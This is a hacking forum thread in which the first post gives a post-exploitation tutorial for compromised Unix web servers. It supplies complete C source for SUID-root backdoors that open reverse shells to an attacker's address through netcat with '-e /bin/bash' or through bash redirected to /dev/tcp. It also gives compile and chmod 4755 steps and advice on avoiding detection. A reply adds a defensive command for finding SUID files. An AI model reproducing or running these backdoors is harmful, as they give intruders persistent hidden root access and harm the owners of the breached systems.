Results 1 to 3 of 3

Thread: Post Exploitation - Run backdoor with root privileges Share/Save - My123World.Com!

  1. #1
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744

    Post Exploitation - Run backdoor with root privileges

    Scenario:

    You managed to slip into target somehow, it could be by exploiting n/w layer vulnerability or through web vulnerabilities. Let's take the case of web vulnerability exploitation e.g. sql injection and you managed to upload and run a web shell (c99, r57 etc.) there.
    Further assumption - web server is running as non-root, which is a general case and recommended. You spawn a reverse connect interactive shell and running a local privilege escalation exploit managed to escalate privilege to root account.
    With root access you can of course do anything - create a new account with root privilege or escalate the privilege of web server account so that reverse connect gives root privilege etc. But they raise eyebrows and could be detected easily.

    Another, one of the smart, move could be to make your backdoor always run as root even when executed by a normal user and spawn a root shell - A SUID shell backdoor. This method is recommended when you have constant non-root access to the target.

    Case 1. Execute netcat through web shell to spawn reverse connect interactive shell with root privilege:
    Prerequisites: Either nc is already there or upload one and you have root access at the moment to run commands.

    Create a 'c' backdoor: backdoor.c
    Code:
    # include <stdio.h>
    # include <string.h>
    
    int main(int argc, char* argv[])
    {
        char cmd[1024];
        if(argc < 2) { printf ("Please enter IP address and port."); exit(0); }
    
        setuid(0);
        strcpy(cmd, "/bin/nc ");    // or the relative path where netcat resides
        strcat(cmd, argv[1]);
        strcat(cmd, " ");
        strcat(cmd, argv[2]);
        strcat(cmd, " -e /bin/bash");
    
        system(cmd);
    }
    // Executing: /bin/nc <IP> <Port> -e /bin/bash
    Setuid is an access right flag which can be set on a binary. When it is set, it permits a non-root user to execute it with root privilege.

    Compile with:
    Code:
    root$ gcc -o backdoor backdoor.c
    
    Now set the setuid bit:
    
    root$ chmod 4755 backdoor or root$ chmod a+s backdoor
    Now the execution of backdoor binary by a non-root user would spawn netcat reverse connect with root privilege.

    Case 2. Use "netcat without netcat" technique to spawn reverse connect interactive shell with root privilege:
    Prerequisite: /dev/tcp is available to use. Though I am not sure but in few of recent *nix distros it's disabled.

    Compile the following code as we did in Case 1:
    Code:
    # include <stdio.h>
    # include <string.h>
    
    int main(int argc, char* argv[])
    {
        char cmd[1024];
        if(argc < 2) { printf ("Please enter IP address and port.\n"); exit(0); }
    
        setuid(0);
        strcpy(cmd, "/bin/bash -i > /dev/tcp/");
        strcat(cmd, argv[1]);    
        strcat(cmd, "/");
        strcat(cmd, argv[2]);
        strcat(cmd, " ");
        strcat(cmd, " 0<&1 2>&1");    
        system(cmd);   
    }
    // Executing: /bin/bash -i > /dev/tcp/10.10.0.1/8080 0<&1 2>&1
    Finally execute the binary through web shell:
    Code:
     /absolute or relative path/backdoor [IP Address] [Port]
    The overall dependencies of this method:
    1. PHP shouldn't be hardened to disable all of the following functions to prohibit you from executing commands through your web shell:
    Code:
    Passthru
    Exec
    System
    Shell_exec
    Cheers and Happy Hacking!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  2. #2

    Cool

    Nice post, after long time seen your in action bond
    Well but when ever I do audit of *nix system I always do
    Code:
    find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
    to find out the suid files in the system ;-)
    Orkut id: neo1981
    Blog: infosec-neo.blogspot.com
    Nothing is Impossible*


    *Conditions Apply

  3. #3
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Quote Originally Posted by neo View Post
    Nice post, after long time seen your in action bond
    Well but when ever I do audit of *nix system I always do
    Code:
    find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
    to find out the suid files in the system ;-)
    I shall amend the "overall dependencies" above and mention that pentester should not be smart enough to look for suid files.

    btw credit for "netcat without netcat" goes to you for introducing the technique to me earlier. I use that quite often now.
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •